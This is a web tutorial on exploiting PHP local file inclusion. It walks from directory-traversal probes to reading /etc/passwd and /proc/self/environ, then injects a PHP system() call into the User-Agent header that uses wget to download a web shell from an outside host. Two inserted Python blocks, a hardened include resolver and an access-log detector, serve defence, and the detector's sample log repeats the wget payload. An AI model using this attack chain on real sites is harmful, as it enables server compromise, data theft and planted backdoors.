Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss the local file inclusion vulnerability: how it occurs and how it can be patched. First, a short introduction to file inclusion.

A file inclusion vulnerability allows an attacker to access unauthorised files on the web server and, in the worst case, execute malicious code through the application's 'include' functionality.

What is a Local File Inclusion (LFI) vulnerability?

Local file inclusion (LFI) is the inclusion of a local file that already exists on the web server. The vulnerability occurs when user input controls the path of the file being included. If that input is not properly sanitised, an attacker can supply the location of well-known system files and read those sensitive files.
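The article says the bug can be patched but never shows the patch, so here is an added example (not the article's code) that puts the vulnerable pattern beside a hardened resolver. It is written in Python rather than PHP and mirrors what a handler built around include($_GET['page']) should do; the PAGES_DIR path and the ALLOWED_PAGES names are assumptions made for the demo.

```python
import os
import urllib.parse
from typing import Optional

# Constructed demo layout (assumption, not from the article): the directory
# that holds the includable pages, and the only names the app may serve.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"contact.php", "about.php", "index.php"}


def resolve_page_unsafe(page: str) -> str:
    """Mirrors the vulnerable pattern include($_GET['page']): the raw
    parameter is joined onto the pages directory with no validation, so a
    run of '../' walks out of PAGES_DIR to any file the web server can read."""
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def resolve_page_safe(page: str) -> Optional[str]:
    """Hardened resolver: decode once, reject control characters, require the
    value to be on an explicit allow list, then confirm the final absolute
    path is still inside PAGES_DIR. Returns None when the request is refused."""
    # The web server normally decodes %2F before the application sees it;
    # decoding here too keeps the check consistent if a value arrives encoded.
    decoded = urllib.parse.unquote(page)
    # A null byte was historically used to cut off a suffix the app appends.
    if "\x00" in decoded or "\n" in decoded or "\r" in decoded:
        return None
    # Allow list: only a known page *name*, never a path, is accepted.
    # This is the real control; blocking "../" alone is easy to get wrong.
    if decoded not in ALLOWED_PAGES:
        return None
    # Defence in depth: resolve symlinks and check containment anyway.
    root = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("contact.php", "../../../../../etc/passwd",
                  "..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"):
        print(f"{value!r:55} unsafe={resolve_page_unsafe(value)} "
              f"safe={resolve_page_safe(value)}")
```

The allow list is what actually closes the hole: because PHP's include executes any PHP tags in whatever file it loads, the fix must stop the application from opening arbitrary files at all, not merely filter one traversal spelling. The realpath containment check is a second layer in case a future page name is itself a path or a symlink.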

Finding a Local File Inclusion (LFI) vulnerability in a website

Now we are going to look for a local file inclusion in a website. Suppose we have found a site with the following URL; let's check whether it is vulnerable.

www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes:

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we get an error, which means there is a good chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now let's check for /etc/passwd to see whether the page is vulnerable to Local File Inclusion. Let's make a request:

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

We get an error and no /etc/passwd file:

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

So we go more directories up:

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you get a page like this, you have successfully included the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file; the next step is to include the /proc/self/environ file. Replace /etc/passwd with /proc/self/environ as shown below.

www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this, you have successfully included /proc/self/environ:

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vulnerablewebsite.com Port 80

/proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not accessible or the OS is FreeBSD.

Injecting malicious code into a Local File Inclusion vulnerable website

Now let's inject our malicious code into /proc/self/environ. How can we do that? We can inject our code through the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent: start Tamper Data in Firefox and re-request the URL

www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now tamper with this request, put your uploader script in the User-Agent header and submit. After submitting, the /proc/self/environ page will show your uploader; browse to it and upload your shell.

You can also upload your shell by downloading it remotely with the wget command.

<?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in the User-Agent and request the page. The command is executed through system(): it downloads the .txt shell from www.shell.com/shell.txt and saves it as shell.php in the website directory, and our shell is created. If it doesn't work, try exec(), because system() can be disabled on the web server in php.ini.
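Every step of the chain above leaves a trace in the web server's access log: the traversal in the query string, the request for /etc/passwd or /proc/self/environ, and a PHP tag where a browser User-Agent should be. The following added example (mine, not the article's) parses constructed Apache combined-format log lines and flags those indicators; the log lines, the example.invalid host and the 203.0.113.x / 198.51.100.x addresses are all made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample log (not from the article). Line 2 is the cleartext
# traversal, line 3 the same request percent-encoded, line 4 carries a PHP
# tag in the User-Agent, line 5 is ordinary traffic from another client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?system('wget example.invalid/s.txt -O shell.php');?>"
198.51.100.9 - - [10/Oct/2023:13:57:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache "combined" format; the layout is an assumption of this demo.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')        # ../ or ..\ after decoding
SENSITIVE_FILES = ("/etc/passwd", "/proc/self/environ")
PHP_TAG_RE = re.compile(r'<\?')                # PHP open tag in a header


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so ..%2F and double-encoded ..%252F
    both normalise to ../ before the pattern checks run."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(entry):
    """Return the list of indicators present in one parsed entry."""
    reasons = []
    path = decode_fully(entry["path"])
    if TRAVERSAL_RE.search(path):
        reasons.append("path-traversal")
    if any(f in path for f in SENSITIVE_FILES):
        reasons.append("sensitive-file")
    for header in ("ua", "referer"):
        if PHP_TAG_RE.search(entry[header]):
            reasons.append(f"php-tag-in-{header}")
    return reasons


def scan_log(text):
    """Scan a whole log; each finding records who, what, and whether the
    server answered 200, which is the article's own sign that the include
    returned real content rather than an error."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        reasons = analyze(entry)
        if reasons:
            status = int(entry["status"])
            findings.append({"ip": entry["ip"], "path": entry["path"],
                             "status": status, "reasons": reasons,
                             "likely_success": status == 200})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["reasons"]), f["path"])
```

Decoding before matching matters: the article's own environ dump shows the same request once as ../ and once as ..%2F, and a rule that only looks for the literal ../ misses the encoded form. A request that is flagged and answered with 200 is the one to triage first, and an attacker-controlled User-Agent with a PHP open tag is a strong signal on its own, whatever the path says.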

Accessing our shell

Now let's check whether our malicious code was successfully injected by checking whether the shell is present:

www.vulnerablewebsite.com/shell.php

Our shell is there. The injection was successful.

So I think everybody enjoyed this tutorial; keep practising and learning. 🙂

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My areas of expertise include Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more.
